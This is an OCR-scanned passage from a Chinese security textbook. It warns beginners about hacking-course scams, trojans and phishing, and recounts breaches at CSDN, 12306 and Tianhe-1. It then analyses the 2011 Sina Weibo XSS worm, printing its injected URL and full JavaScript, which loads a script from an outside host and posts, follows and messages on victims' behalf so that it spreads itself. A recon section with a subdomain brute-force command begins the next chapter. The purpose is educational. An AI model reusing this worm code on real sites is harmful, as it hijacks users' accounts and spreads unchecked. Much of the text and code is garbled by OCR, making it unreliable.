标题 ， 实 际 情况 如 何 ， 各 位 读者 心中 ， 应 该 都 有 一 面 明 镜 。 





22 ” 害 人 之 心 不 可 有 ， 防 人 之 心 不 可 无 





对 于 网 络 安全 以 及 黑客 技术 这 块 轩 新 的 领域 ， 很 多 人 往往 感到 不 知 所 措 、 前 进 困难 ， 
这 时 就 出 现 了 一 些 不 怀 好 意 的 人 ， 利 用 各 种 各 样 的 手段 “伤害 ”读者 ， 我 们 现在 就 来 剖析 
一 下 这 些 常见 的 现象 。 


221 “高 明 ” 的 骗子 


初学 者 不 了 解 黑客 的 世界 ， 却 又 不 断 尝试 接触 ， 这 时 ， 不 怀 好 意 的 人 就 会 乘虚 而 入 ， 
利用 初学 者 对 于 黑客 的 不 了 解 ， 自 称 黑客 高 手 ， 说 出 一 些 看 似 高 深 的 名 词 ， 骗 取 初 学 者 的 
信任 ， 并 要 求 其 缴纳 “学 费 ”， 这 种 行为 与 诈骗 无 异 。 但 由 于 取证 困难 ， 骗 子 很 难得 到 惩 
罚 ， 这 更 加 助长 了 他 们 的 器 张 气焰 。 

在 此 ， 笔 者 将 介绍 一 些 识别 骗子 的 方法 ， 各 位 可 以 作为 参考 ， 或 告诉 身边 对 黑客 技术 
感 兴趣 的 初学 者 ， 提 高 警惕 ， 说 防 上 当 受 骗 。 


1. 所 谓 黑客 


很 多 时 候 ， 骗 子 们 会 在 各 种 社区 、 论 坛 或 是 社交 网 站 上 发 布 类 似 于 “黑客 收 徒 ” 的 信 
息 ， 往 往 伴随 着 “技术 列表 ”， 如 图 2-1 所 示 。 

这 是 一 种 典型 的 骗术 ， 可 能 那些 人 对 所 列举 的 技术 仅仅 是 知道 名 字 而 已 ， 有 时 打出 的 
“特价 收 徒 ” 则 满足 了 一 些 人 贪图 小 利 的 性 格 ， 使 其 上 当 受 骗 。 除 此 之 外 ， 试 想 ， 如 果 这 
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个 人 的 技术 真 的 如 此 高 深 ， 为 什么 还 会 为 了 几 十 元 钱 而 到 处 散布 “ 收 徒 信息 ”， 张 口 闭 口 
就 是 “ 收 钱 ” 呢 ? 真正 的 技术 大 牛 应 该 是 抓紧 时 间 研 究 技术 ， 提 升 自 己 。 另 外 ， 笔 者 想 纠 
正 一 个 普遍 存在 的 认识 错误 : “盗号 ”很 简单 。 试 想 ， 如 果 盗 号 真 的 如 此 简单 ， 那 让 腾 
讯 、 阿 里 巴巴 这 些 大 公司 的 技术 人 员 情 何以 堪 ? 就 算 真 的 有 人 拥有 这 样 的 技术 ， 他 也 不 
会 为 了 一 些 可 笑 的 理由 去 盗 取 别 的 社交 账号 的 。 

对 于 这 种 情况 ， 不 妨 随意 想 一 种 不 存在 的 “技术 名 称 ”， 询 问 对 方 是 否 掌握 ， 如 果 
对 方 想 都 没 想 就 肯定 ， 那 么 谎言 将 不 攻 自 破 。 如 图 2-2 所 示 ， 我 随意 组 合 了 SQL 和 XSS 两 
个 名 词 。 
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图 2-1 “ш ав” 图 2-2 与 骗子 交谈 截图 ( 无 论 你 说 
fA, 最 终结 果 都 会 是 : 伸手 要 钱 ) 





2. 不 要 随意 运行 不 明 程 序 


有 一 些 骗术 手段 更 加 隐蔽 ， 以 发 送 “ 黑 客 软件 ”为 借口 ， 给 没有 防备 的 新 手 发 送 木 马 
软件 ， 窃 取信 息 ， 甚 至 让 你 的 计算 机 在 无 声 无 息 中 沦 为 “肉鸡 ”《〈 受 黑客 远程 控制 的 计算 
PO 。( 关 于 木马 ， 在 第 9 章 会 有 更 多 相关 介绍 。) 


3. 不 要 被 看 似 “ 黑 客 ”的 东西 蒙 项 


很 多 新 手 对 黑客 感 兴趣 是 因为 “觉得 很 酷 ”， 正 因 如 此 ， 骗 子 们 往往 会 用 一 些 很 
酷 的 东西 来 吸引 别人 。 例 如 “匿名 者 ”以 及 “V 字 T SIX 
仇杀 队 ”【〔 图 2-2 左 侧 头 像 》，“ 匿 名 者 ”黑客 团 7 
队 给 人 留 下 的 印象 就 是 “ 酷 ” 和 “神秘 ”， 见 图 
2-3， 也 难怪 很 多 骗子 打 着 “匿名 者 ”的 蛋子 招摇 撞 
骗 了 。 

还 是 那 名 话 ， 真 正 钻研 技术 的 人 是 不 需要 这 些 表 
面 功夫 的 。 用 社交 网 络 上 夸张 的 头像 等 信息 来 彰显 自 
己 “ 黑 客 ”身份 的 人 ， 大 多 数 是 骗子 或 “娱乐 圈 ” 人 i 
士 。 关 于 “娱乐 圈 ”， 下 一 小 节 会 做 说 明 。 图 2-3 “匿名 者 ”标志 
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4. 以 假 乱 真 的 骗术 


一 些 曾 经 在 网 络 世 界 中 招摇 撞 骗 的 人 ， 或 因 巧 合 ， 或 因 其 他 原因 ， 搜 集 了 一 些 技术 书 
籍 的 电子 版 本 或 一 些 效 果 明 显 的 软件 ， 在 “学 徒 ”缴纳 学 费 后 ， 发 送 给 他 们 ， 其 实说 不 定 
他 们 自己 都 看 不 懂 这 些 书 的 内 容 。 


222 ”黑客 也 有 娱乐 圈 


娱乐 圈 在 我 们 的 社会 不 可 或 缺 ， 但 在 网 络 安全 的 世界 里 ， 这 个 词 就 颇 有 些 讽刺 意义 
了 。“ 黑 客 娱 乐 圈 ”本 身 没 有 一 个 准确 的 定义 ， 一 般 认为 : 没有 钻研 技术 的 精神 ， 整 天 考 
虑 如 何 让 自己 看 起 来 像 黑 客 ， 仅 会 使 用 一 些小 工具 就 沾沾自喜 、 停 滞 不 前 的 人 就 是 娱乐 圈 
成 员 ， 也 经 常用 来 代 指 以 “黑客 ”为 哮 头 炒作 自己 的 人 。 

这 样 的 人 往往 在 一 些 QQ 群 里 出 现 ， 这 些 群 一 般 都 有 成 百 上 干 的 群 成 员 ， 并 且 各 个 群 
之 间 的 成 员 有 着 相当 高 的 重合 性 一 一 这 些 混迹 于 各 种 社交 群 的 人 总 会 添加 不 止 一 个 娱乐 
群 。 如 果 读 者 有 一 位 同学 ， 每 天 沉迷 于 谈论 “ 刷 QQ 钻 石 ”“ 网 赚 ” 这 些 东西 ， 并 乐 此 不 
疲 地 在 自己 的 社交 朋友 轿 发 布 “ 收 徒 信息 ”， 那 么 没 错 了 ， 他 九 成 就 属于 笔者 所 说 的 “ 娱 
乐团 ”。 他 们 沉浸 在 自己 浮躁 的 世界 里 ， 并 乐 在 其 中 。 

这 并 不 是 个 例 ， 很 多 刚 进入 这 个 圈子 或 渴望 进入 这 个 圈子 的 新 手 都 希望 追求 一 些 更 “ 酷 ” 
的 事物 ， 而 不 是 潜心 钻研 技术 。 好 奇 之 心 人 省 有 之 ， 笔 者 没 资格 要 求 他 们 做 什么 ， 但 希望 他 
们 ， 特 别 是 徘徊 在 “娱乐 圈 ” 的 朋友 们 能 看 清 那些 光鲜 下 的 不 实 ， 戒 骄 戒 躁 ， 悬 崖 勒 马 。 


223 ”防范 钓鱼 网 站 


钓鱼 网 站 的 存在 确实 给 诈骗 活动 提供 了 便利 〈 例 如 ， 恭 喜 您 获得 了 价值 X x X 元 的 
XX 奖品 一 类 ) ， 但 在 此 笔者 要 说 的 重点 是 针对 用 户 账 号 、 密 码 的 钓鱼 页 面 。 

随 着 Web 技 术 越 来 越发 过， 制作 钓鱼 页 面 的 技术 也 随 之 提高 ， 除 去 用 来 诈骗 的 钓鱼 页 
面 ， 还 有 一 种 钓鱼 页 面值 得 人 们 关注 ， 即 黑客 攻击 钓鱼 页 面 。 这 种 类 型 的 钓鱼 页 面 一 般 以 
得 到 目标 用 户 密码 等 隐私 信息 为 目的 ， 伪 造 目标 用 户 熟 悉 的 Web 环 境 并 实施 攻击 ， 在 6.4 节 
有 一 个 基于 XSS 的 钓鱼 示例 ， 读 者 可 以 提前 看 一 下 。 

为 了 防范 这 种 钓鱼 攻击 ， 最 便捷 可 靠 的 方法 就 是 留意 浏览 器 URL 信 息 。 

注意 : 此 处 仅仅 是 指 浏览 器 显示 的 URL， 而 并 不 是 点 击 链接 时 的 URL 一 一 因为 
URL 可 以 跳 转 ， 比 如 近期 就 有 一 个 蠕虫 在 各 大 社交 网 站 、 朋 友 圈 传播 ， 中 招 的 用 户 者 
会 以 不 同方 式 发 送 一 个 URL: http://paypassport.suning.com/ids/oauth20/authorize?client _ 
id-suning Ol&response type=code&redirect uri-http:// X X X .com&www.qq.com. 

这 个 链接 实则 是 跳 转 到 了 xxx.com， 攻 击 者 又 在 最 后 加 入 了 www.qq.com 进 行 迷惑 ， 受 
害 者 往往 在 无 意 中 就 成 为 了 蠕虫 传播 的 一 个 环节 ， 这 种 方式 也 被 用 于 隐藏 XSS 的 攻击 。 

那么 ， 在 受害 者 没有 意识 地 进入 攻击 者 的 网 站 之 后 ， 下 一 步 攻 击 又 是 如 何 展开 的 呢 ? 
用 户 的 密码 信息 又 是 如 何 神 不 知 鬼 不 觉 地 泄露 的 呢 ? 
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攻击 者 制作 的 登录 页 面 看 起 来 和 真正 的 登录 页 面 无 异 ， 但 这 个 页 面 的 工作 原理 如 下 : 

(1) 受害 者 输入 账号 、 密 码 信息 。 

(2) 提示 密码 错误 ， 后 台 第 一 次 记录 账号 、 密 码 。 

(3) 受害 者 再 次 输入 账号 、 密 码 。 

(4) 提示 密码 正确 ， 并 跳 转 到 受害 者 真正 想 访 问 的 网 站 ， 同 时 后 台 第 二 次 记录 上 账 
号 、 密 码 。 

(5) 记录 两 次 输入 的 密码 ， 发 送 给 攻击 者 。 

这 样 一 来 ， 抱 有 “我 第 一 次 随便 输入 密码 就 知道 是 不 是 真 的 ”心态 的 防御 方式 彻底 宣 
告 失败 。 

回 到 刚才 的 那 句 话 : “最 便捷 可 靠 的 方式 就 是 留意 浏览 器 上 的 URL 信 息 ”， 伪 装 得 再 
精妙 的 钓鱼 页 面 ，URL 也 有 着 明显 的 不 同 ， 在 登录 时 留意 URL 栏 ， 无 疑 是 一 种 简便 高 效 的 
防御 方式 。 该 方法 不 能 防御 6.4 节 提 到 的 XSS 覆 盖 页 面 攻击 ， 不 过 无 须 过 于 担心 ， 遇 到 这 种 
攻击 的 概率 实在 是 可 以 忽略 。 

还 有 一 点 需要 注意 的 是 ， 有 些 钓鱼 攻击 者 会 用 子 域名 来 迷惑 用 户 的 眼睛 ， 例 如 : 
www.baidu.com.xxx.com〔 假 设 xxx.com 为 攻击 者 的 网 站 。) 

这 就 需要 我 们 睁 大 眼睛 ， 对 于 要 求 输入 密码 的 网 站 多 留心 ， 或 是 观察 浏览 器 提供 的 信 
息 来 发 现 这 些 钓鱼 页 面 ( 一 些 浏 览 器 会 自动 判断 该 网 站 的 真 伪 〉。 
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23.1 CSDN 事 件 


2011 年 12 月 21 日 上 午 ， 有 了 骇 客 在 网 上 披露 CSDN 数 据 库 泄露 ， 并 提供 了 下 载 地 址 ， 高 
达 600 余 万 个 注册 邮箱 与 密码 泄露 ， 并 且 所 有 密码 都 使 用 明文 储存 。CSDN 是 国内 最 大 的 
以 程序 员 为 核心 的 大 型 网 站 ， 却 采用 明文 储存 用 户 密码 (当时 即便 是 小 型 BBS 网 站 数据 库 
都 采用 MD5 等 方式 对 密码 加 密 ) 。 

21 日 晚 ，CSDN 发 布 声明 并 道 次 。 据 CSDN 官 方 解 释 ， 该 数据 库 为 CSDN 作 为 备份 所 
用 ，CSDN 在 2009 年 4 月 之 前 是 以 明文 保存 密码 ， 而 泄漏 原因 不 详 。 

继 CSDN 的 数据 库 泄漏 之 后 ， 天 涯 社区 、 世 纪 佳缘 、 开 心 网 等 十 余 家 国内 知名 网 站 的 
近 5000 万 用 户 信 息 陆续 在 网 上 被 人 公布 ， 各 大 社区 的 信誉 也 遭受 质疑 。 当 然 ， 这 次 严重 的 
事故 同时 也 提高 了 国内 对 网 络 信 息 安全 的 重视 。 


2.3.2 ”12306 事 件 


2014 年 12 月 23 上 午 ， 乌 云 漏洞 报告 平台 上 出 现 了 一 则 标题 为 “大 量 12306 用 户 数据 在 
互联 网 疯 传 ， 包 括 用 户 账 号 、 明 文 密码 、 身 份 证 号 码 、 邮 箱 等 〈 汇 漏 途径 目前 未 知 ) ” 
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的 新 闻 ， 缺 陷 编号 为 WooYun-2014-88532。 这 可 让 网 上 一 下 炸 了 锅 ， 各 种 讨论 与 分 析 瞬 
间 出 炉 ， 根 据 对 泄漏 数据 的 分 析 及 当晚 的 官方 信息 ， 这 次 事件 极 有 可 能 是 一 次 “ 撞 库 攻 
击 ”。 那 么 何谓 “ 撞 库 ”? 就 拿 刚才 提 到 的 CSDN 数 据 泄露 来 说 ， 攻 击 者 如 果 用 这 些 泄露 
的 数据 尝试 登录 12306 网 站 ， 或 是 编写 脚本 进行 大 量 登 录 测试 ， 就 叫 撞 库 攻击 。 然 而 被 泄 
露 的 数据 远 不 止 CSDN 这 么 多 ， 量 变 引 起 质变 ， 多 米 诺 骨 有 牌 效应 导致 了 大 量 数 据 的 泄露 。 


233 ” “天河” 超级 计算 机 事件 


2015 年 2 月 12 日 ， 又 一 个 神奇 的 漏洞 引起 了 广泛 关注 ， 这 个 漏洞 竟然 出 现在 超级 计算 
机 天 河 一 号 上 ， 着 实 令 人 震惊 〈 图 2-4) 。 但 是 仔细 一 看 漏洞 细节 ， 却 又 让 人 啼笑 皆 非 ; 
天 河 一 号 的 办 公 环 境 有 一 个 未 加 密 的 无 线 网 络 ， 任 何 设备 都 可 以 轻易 接 入 ， 直 接 进入 内 
网 。 这 位 白 帽 子 小 黑客 顺便 找 了 找 其 他 可 能 存在 的 漏洞 ， 这 一 找 可 不 得 了 ， 他 发 现 天 河 一 
号 超级 计算 机 内 部 存在 大 量 弱 口令 ， 以 及 部 分 服务 器 存在 破 壳 漏 洞 〈 即 bash 漏 洞 ， 一 个 十 
分 严重 的 Linux 漏 洞 ) 。 
漏洞 概要 


WRS: WooYun-2015-97005 

Маю: KISERA ADAT FRESAS, ЕРКЕШ) T 
相关 厂商 ; 中 国 国家 超级 计算 机 中 心 

mre: zph 

提交 时 间 : 2015-02-12 17:42 

公开 时 间 : 2015-03-29 17:44 

RARD: MUNAR 

maswa: ж 

自 评 Rank : 20 

пахо: 已 交 由 和 握 三 方 台 作 机 构 (cncert 国 家 互联 网 应 急 中 心 ) 处 理 
RARA: http: / /www.wooyun.org 

Tags 标 签 : 无 








图 2-4 天河 一 号 漏洞 信息 
回顾 以 上 列举 的 3 个 典型 安全 事件 ， 其 都 与 密码 安全 息息相关 ， 也 正好 对 应 了 密码 安 
全 中 3 个 “过 不 去 的 坎 ”: 明文 存储 、 撞 库 〈 同 一 密码 多 用 ) 和 弱 口 令 。 更 多 关于 密码 安 
全 的 知识 ， 请 见 附 录 。 


234 新 浪 微 博 XSS 蠕 虫 事件 


2011 年 6 月 28 日 晚 ， 中 国 大 型 SNS 网 站 一 一 新 浪 网 的 新 浪 微 博 业 务 遭 受 XSS 蠕 虫 攻击 。 
中 招 的 微 博 博 主 会 自动 通过 广播 和 私信 的 方式 发 布 一 些 诱惑 性 信息 ， 用 户 单 击 链接 后 便 会 
触发 XSS， 发 布 同样 的 信息 并 自动 关注 hellosamy， 中 招 的 用 户 单 击 后 又 会 触发 XSS， 蠕 虫 
便 如 链 式 反应 般 传 播 。 由 于 蠕虫 的 指数 爆炸 型 传播 、 微 博 的 分 享 形 式 以 及 一 些 大 V 认 证 的 
用 户 被 攻击 ， 该 蠕虫 在 16 分 钟 内 就 感染 了 30 000 名 以 上 用 户 ， 可 以 说 是 近 几 年 中 国 SNS 社 
区 受到 的 最 大 的 一 次 攻击 。 

这 次 攻击 并 没有 直接 造成 用 户 的 重大 损失 ,更 像 是 一 场 黑客 的 恶作剧 (从 收听 的 
hellosamy 用 户 也 能 看 出 ，Samy 是 XSS 里 虫 鼻 祖 herosamy 的 作者 ， 他 的 XSS 里 虫 曾 造成 社交 
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网 站 MySpace 的 瘫痪 ) 。 但 同样 ， 这 次 事件 也 提高 了 公众 对 信息 安全 的 关注 (随后 新 浪 多 
处 反射 型 XSS 被 披露 ) 。 而 这 次 漏洞 成 因 更 让 人 大 跌眼镜 : 新 浪 对 该 参数 竟然 完全 没有 过 
滤 ! 这 次 攻击 在 Chrome、Safari 中 会 被 XSS Filter 拦 截 ， 而 了 E、Firefox 未 能 幸免 ， 根 据 当 时 
本 、Firefox 的 市 场 占 有 率 ， 这 的 确 是 一 次 范围 很 广 的 攻击 。 

让 我 们 来 分 析 一 下 这 个 被 用 来 传播 XSS 蠕 虫 的 URL: 


http://weibo.com/pub/star/g/xyyyd” ><script src-//www.2kt.cn/images/ 
t.js></script>?type=update 


在 访问 这 个 URL 时 ， 新 浪 会 对 字符 串 进行 处 理 ， 结 果 变 成 了 访问 : 


http://weibo.com/pub/star.php?g-xyyyd" »«script src-//www.2kt.cn/ 
images/t.js»«/script»?type-update 


由 于 参数 g 并 没有 进行 应 有 的 过 滤 ， 导 致 这 个 来 自 外 部 的 JS 脚本 被 嵌入 页 面 内 。 


function createxHR(){ 
return window.XMLHttpRequest? 
new XMLHttpRequest () : 
new ActiveXObject ("Microsoft .XMLHTTP") ; 
) 
function getappkey (url) { 
xmlHttp - createXHR(); 
xmlHttp.open("GET",url,false); 
xmlHttp.send(); 
result - xmlHttp.responseText; 
id arr = ''; 
id = result .match (/namecard=\"true\" title=\"[^\"]*/g); 
for (i=0;i<id.length; i++) { 
sum = id[i].toString().split('"") [3]; 
id arr += sum + '||'; 
} 
return id arr; 
} 
function random msg()( 
link = ' http://163.fm/PxZHoxn?id=' + new Date().getTime();; 
var msgs = [ 
" 郭 某 某 事件 的 一 些 未 注意 到 的 细节 : t, 
"让 女人 心动 的 100 名 诗歌: ', 


EN 黑客 与 安全 技术 指南 


'3D 某 团团 高 清 普通 话 版 种 子 : ', 
"这 是 传说 中 的 神仙 眷 侣 啊 : ', 
" 惊 爆 ! 范 某 某 艳照 真 流出 了 : ', 
" 杨 某 被 爆 多 次 被 潜 规则 : ', 
' 傻 仔 拿 锤子 去 抢 银 行 : ', 
"可 以 监听 别人 手机 的 软件 : ', 
"个 税 起 征 点 有 望 提 到 4000: "1; 
var msg = msgs[Math.floor(Math.random()*msgs.length)] + link; 
msg = encodeURIComponent (msg) ; 
return msg; 
} 
function post (url,data,sync)( 
xmlHttp = createXHR(); 
xmlHttp.open ("POST",url,sync); 
xmlHttp.setRequestHeader ("Accept","text/html,application/ 
xhtml«xml,application/xml;q-0.9,*/*;q-0.8"); 
xmlHttp.setRequestHeader ("Content-Type","application/x-www-form- 
urlencoded; charset-UTF-8"); 
xmlHttp.send (data); 
) 
function publish()t 


/* 

* 发 送 带 有 蠕虫 链接 的 广播 传播 自身 

Z 

url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date(). 
getTime(); 

data = 'content=' + random msg() + '&pic=&styleid=2&retcode='; 


post(url,data,true); 


} 


function follow()( 


/* 
* 收 听 hellosamy 
eut 

url = 'http://weibo.com/attention/aj addfollow.php?refer sort-pro 


file&atnId-profile&rnd-' + new Date().getTime(); 
data = 'uid-' + 2201270010 + '&fromuid-' + $CONFIG.$uid + '&refer 


Sort-profile&atnId-profile'; 


post (url,data,true); 


} 


function message () { 


/* 
* 自 动向 好 友 发 送 含 蠕虫 链接 私信 
d 

url Е 

ids = getappkey (url); 


id = ids.split('||"):; 


for(i-0;i«id.length - 1 & 1<5;1++){ 
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'http://weibo.com/' + $CONFIG.$uid + '/follow'; 


msgurl = 'http://weibo.com/message/addmsg.php?rnd-' + new Date(). 


getTime(); 


msg 


msg = encodeURIComponent (msg) ; 


random msg(); 


user = encodeURIComponent (encodeURIComponent (id[i])); 


data = 'content-' + msg + '&name-' + user + '&retcode-'; 


post (msgurl,data, false); 


) 
) 
function main()( 
try( 
publish(); 
} 
catch (е) () 
try{ 
follow(); 
} 
catch (е) () 
tryt 
message(); 
1 
catch (е) { } 
} 
tryt 


x= g-document.createElement('script');g.src-'http://www.2kt.cn/ 


images/t.js';document.body.appendChild (g)";window.opener.eval(x); 


} 
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саїсһ(е){} 
main(); 


var t=setTimeout('location="http://weibo.com/pub/topic";',5000); 


24 开源 理念 


“开源 ” 即 开 放 源 代码 ， 具 有 开源 特性 的 软件 〈 包 括 操作 系统 ) ， 其 源 代码 对 所 有 人 
开放 ， 任 何人 均 可 以 修改 、 使 用 、 再 发 行 这 些 软件 。 下 面 让 我 们 来 简单 地 了 解 一 下 开源 。 

相信 大 家 都 听 说 过 GNU 基 金 会 基于 Linus Torvalds 开 发 的 Linux 内 核 创立 的 GNU/Linux 
〈 也 称 Linux) 操作 系统 ， 它 的 许多 发 行 版 本 例如 Debian、Ubuntu、Red Hat 等 均 为 基于 开 
源 内 核 的 再 创作 ， 广 为 程序 员 与 技术 人 员 所 知 。 本 书 中 提 到 的 许多 软件 ， 如 Virtual Box 虚 
拟 机 等 ， 也 是 开源 软件 。 

开源 软件 并 非 如 其 字面 意义 一 般 只 是 简单 地 放出 软件 的 源 代码 。 开 源 软件 需要 配备 开 
源 许 可 证 ， 不 同 的 开源 软件 通常 会 因 不 同 的 开源 目的 选择 不 同 的 许可 证 ， 例 如 Linux 内 核 
使 用 的 是 GPL 许可 证 ， 而 Android 系 统 使 用 的 是 Apache 许 可 证 。 不 同 的 许可 证 决定 了 大 家 
可 以 如 何 使 用 这 份 代码 ， 例 如 GPL 许可 证 规定 了 任何 使 用 了 GPL 源码 的 程序 也 必须 用 GPL 
许可 证 开源 。 常 见 的 开源 许可 证 有 GPL、MIT、Apache、MS-PL 等 。 开 源 软件 在 国外 通常 
也 被 称 为 自由 软件 (Free Software) ， 自 由 软件 的 一 个 关键 特征 就 是 它 的 许可 证 ， 不 使 用 
开源 许可 证 发 布 的 源 代码 在 美国 法 律 中 依然 被 认定 为 专 有 作者 享有 完整 知识 产权 ) Ж 
件 ， 例 如 微软 发 布 的 Reference Source。 国 内 在 开源 软件 领域 尚 处 于 法 律 讶 区， 也 造成 了 一 
些 大 型 厂商 无 所 顾忌 ， 出 现 了 不 遵守 开源 协议 的 现象 。 

开源 代表 着 自由 、 高 效率 和 共享 。 作 为 程序 员 、 开 发 人 员 的 读者 ， 可 以 使 用 源 代码 
进行 二 次 开发 并 再 发 布 ， 也 可 以 对 原始 开源 项 目 进行 拓展 ， 将 更 改 提 交 回 原始 代码 仓库 ， 
使 开源 软件 的 特性 更 多 、 功 能 更 强大 、 更 易 使 用 ， 同 时 提升 普通 用 户 的 使 用 体验 。 这 些 对 
开源 软件 做 出 贡献 的 开发 者 也 称 为 开源 者 ， 他 们 和 其 他 为 开源 软件 做 出 贡献 的 人 员 《 例 如 
进行 本 地 化 或 参与 测试 的 人 员 ) 组 成 了 开源 社区 。 近 些 年 随 着 互联 网 的 高 速 发 展 ， 开 源 在 
国内 也 越 来 越 受 欢 迎 ， 各 类 开源 社区 大 量 涌现 ， 许 多 城市 都 有 了 当地 的 LUG (Linux User 
Group/Linux，Linux 用 户 社 组 ) ， 还 有 一 些 类 似 AOSC 〈 安 同 开源 社区 ) 这 样 专 精 于 开发 
自己 的 开源 软件 /系统 的 社区 。 开 源 与 开发 者 、 使 用 者 是 相得益彰 的 ， 而 它 所 体现 出 的 自 
由 、 共 享 与 探索 精神 ， 则 与 黑客 精神 在 本 质 是 相通 的 。 

我 们 会 在 第 4 章 讲 到 对 开源 CMS (Content Management System) 的 审计 技巧 ，CMS 即 
内 容 管理 系统 ， 随 着 Web 2.0 时 代 的 发 展 ， 越 来 越 多 的 企业 、 个 人 在 使 用 CMS 建设 网 站 。 
由 于 几乎 所 有 CMS 都 开源 ， 所 以 很 多 的 CMS 漏洞 挖掘 实际 上 是 基于 代码 审计 ， 也 就 是 白 
盒 漏洞 挖掘 。 在 阅读 代码 审计 章节 前 ， 请 先 锻炼 一 下 自己 的 代码 阅读 能 力 。 
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黑客 的 世界 五 彩 缤纷 ， 但 又 充斥 着 华而不实 的 东西 ， 黑 客 确实 看 起 来 很 酷 ， 但 这 酷 的 
背后 其 实 蕴含 着 十 分 艰苦 的 学 习 过 程 ， 希 望 一 践 而 就 的 人 往往 会 落 进 不 怀 好 意 者 的 圈套 。 
黑客 与 安全 并 不 是 相对 的 ， 他 《〈 它 ) 们 相辅相成 一 一 因为 有 黑客 的 探索 才 会 有 安全 ， 又 正 
是 因为 无 法 做 到 绝对 安全 ， 黑 客 才 有 存在 的 意义 。 如 果 你 确定 自己 有 坚持 下 去 的 毅力 ， 请 
翻 开 下 一 页 ， 我 们 将 开始 真正 地 讲述 那 看 起 来 神秘 的 “黑客 技术 ”。 


s: di  — 
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何谓 Web 渗 透 测试 (Penetration Tes). ? 相信 大 家 对 Web 都 不 陌生 ， 渗 透 测 试 一 般 是 指 
通过 模拟 黑客 的 恶意 攻击 ， 来 评估 计算 机 网 络 系统 的 安全 性 ， 若 发 现 系统 存在 漏洞 ， 则 提 
交 渗透 报告 给 被 测试 系统 的 拥有 者 ， 并 提供 修复 方案 。 本 章 将 通过 对 Web 应 用 及 服务 器 的 
渗透 测试 ， 带 各 位 详细 了 解 渗透 测试 的 方法 和 技能 。 

本 章 知 识 涉及 的 内 容 较 为 分 散 ， 和 希望 读者 能 够 掌握 学 习 技巧 ， 务 必 亲 自动 手 实践 ， 
“ 熟 ” 方 能 生 “ 巧 ”。 
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信息 搜集 是 Web 渗 透 的 第 一 步 ， 也 是 至 关 重 要 的 一 步 (实际 上 除了 Web 渗 透 ， 很 多 工 
作 的 第 一 步 都 是 信息 搜集 ) 。 一 次 完整 的 渗透 过 程 是 漫长 的 ， 前 期 信息 搜集 可 以 让 人 们 初 
步 了 解 渗透 目标 ， 而 后 期 信息 搜集 却 往 往 是 成 功 的 关键 。 任 何 攻击 与 防御 之 间 的 较量 ， 都 
是 基于 信息 的 掌控 程度 ， 在 信息 不 对 等 的 情况 下 ， 很 容易 出 现 误 判 或 失误 。 在 安全 行业 团 
队 的 测试 中 ， 信 息 搜集 被 视 为 “最 重要 ， 最 耗 时 ”的 一 个 步骤 ， 甚 至 有 专门 的 成 员 负责 信 
息 的 搜集 与 分 析 。 下 面 我 们 来 了 解 一 些 常用 的 信息 搜集 技巧 〈 这 里 使 用 的 词语 是 “信息 搜 
集 ” 而 非 “ 信 息 收 集 ”， 是 因为 “ 搜 ” 字 能 更 好 地 体现 出 归纳 整理 的 含义 ， 有 一 定 的 选择 
性 和 方向 性 ) 。 


3.1.1 服务 器 信息 搜集 


1. 旁 站 


何谓 旁 站 攻击 ?就 是 一 个 服务 器 上 有 多 个 Web 站 点 ， 而 我 们 的 渗透 目标 是 其 中 的 一 个 
Web 站 点 ， 当 我 们 无 法 拿 下 目标 站 点 时 ， 则 可 以 尝试 对 服务 器 上 的 其 他 站 点 进行 渗透 ， 然 
后 再 通过 跨 目 录 或 提 权 等 方法 拿 下 目标 站 点 。 常 见 的 旁 站 查询 流程 如 下 。 

(1) 获得 渗透 目标 的 真实 IP 地 址 。 

(2) 利用 网 站 平台 、 工 具 反 查 由 地 址 。 


2. 端口 扫描 


一 台 计 算 机 开放 的 端口 和 它 开放 的 服务 是 对 应 的 ， 而 渗透 测试 人 员 可 以 通过 端口 扫描 
大 致 了 解 目 标 开放 了 哪些 服务 ， 如 80 端 口 对 应 了 HTTP 服 务 ，3306 端 口 对 应 了 MySQL 数 据 
库 ，1433 端 口 对 应 了 MSSQL 数 据 库 。 通 过 对 开放 端口 的 分 析 ， 我 们 便 可 以 大 致知 道 目标 
网 站 使 用 了 什么 数据 库 ， 并 可 以 尝试 进行 数据 库 的 爆破 。 此 外 ， 端 口 扫描 对 后 台 的 查找 和 
后 期 的 提 权 也 是 至 关 重 要 的 。 那 常见 的 端口 扫描 方式 又 有 哪些 呢 ? 

(OD 在 线 平 台 。 很 多 平台 都 提供 端口 扫描 的 功能 ， 并 且 提 供 常见 服务 的 默认 端口 ， 
如 图 3-1 所 示 。 
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图 3-1 在线 端口 扫描 平台 


(2) 工具 。 


3.1.2 Web 信息 搜 集 


1. 二 级 域名 


在 对 一 些 大 型 网 站 进行 渗透 测试 时 ， 主 站 很 难 直 接 发 现 漏洞 ， 
例如 SQL 注 入 ， 往 往 因为 数据 库 的 配置 不 严谨 ， 导 致 黑客 可 以 利用 子 站 的 注入 进行 跨 库 ， 
或 者 拿 下 子 站 的 服务 器 ， 利 用 内 网 危害 到 主 站 的 安全 。 图 3-3 便 是 用 一 个 Python 的 脚本 来 


对 百度 的 二 级 域名 爆破 的 结果 


Л python - subDomainsBrutePy baidu.com -f subnames.txt -o ouixt cbo 


端口 扫描 工具 如 图 3-2 所 示 。 





Маде By ШЕЖЕ 三 完成 后 自动 保存 并 退出 。 
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图 3-2 端口 扫描 工具 
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图 3-3 ”利用 脚本 爆破 出 211 个 子 域名 


2. 目录 信息 
在 渗透 中 ， 目 录 是 极为 重要 的 


信息 。 如 果 得 到 了 根 目 录 ， 便 可 以 结合 注入 进行 





而 子 站 容易 出 现 问题 。 


ОЁ 
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GetShell (取得 权限 ) ， 如 果 有 了 Web 目 录 ， 便 可 以 党 试 对 后 台地 址 进行 爆破 ， 对 后 台 文 
件 进行 猜 解 。 由 此 可 见 目录 的 重要 性 ， 而 获得 目录 的 常见 方法 如 下 所 述 。 
(1) phpinfo 和 探 针 文件 。phpinfo 文 件 如 图 3-4 所 示 。 





图 3-4 рһріпіох 
PHP 探 针 文件 如 图 3-5 所 示 。 





[CE pw 





[d -一 一 一 一 一 -= oo Jan 22 161909 EST 2012 x6 64 
memamus [uns аек š 下 
икен СЕТКЕ sasa во 

Г ттар тила EI 

emt esi янва » Ещ " 

m... ES sdi 
Лема 2013-03-18 034212 Босат 。 “FE134had579 村 


CPUS пеш] | AMD Osgteron(tm) Processor 6128 | SE:8900 000 | 7:512 KB | Bogomips:3999.99 x16 
t gm; =a 
| 

18 








物理 内 存 : 共 31438 G , 2792516, SA 22187 6. 8I 942% 
ILL 

cache 化 内 他 为 7748 G Л 2425 | Buen 0571 6 
— 

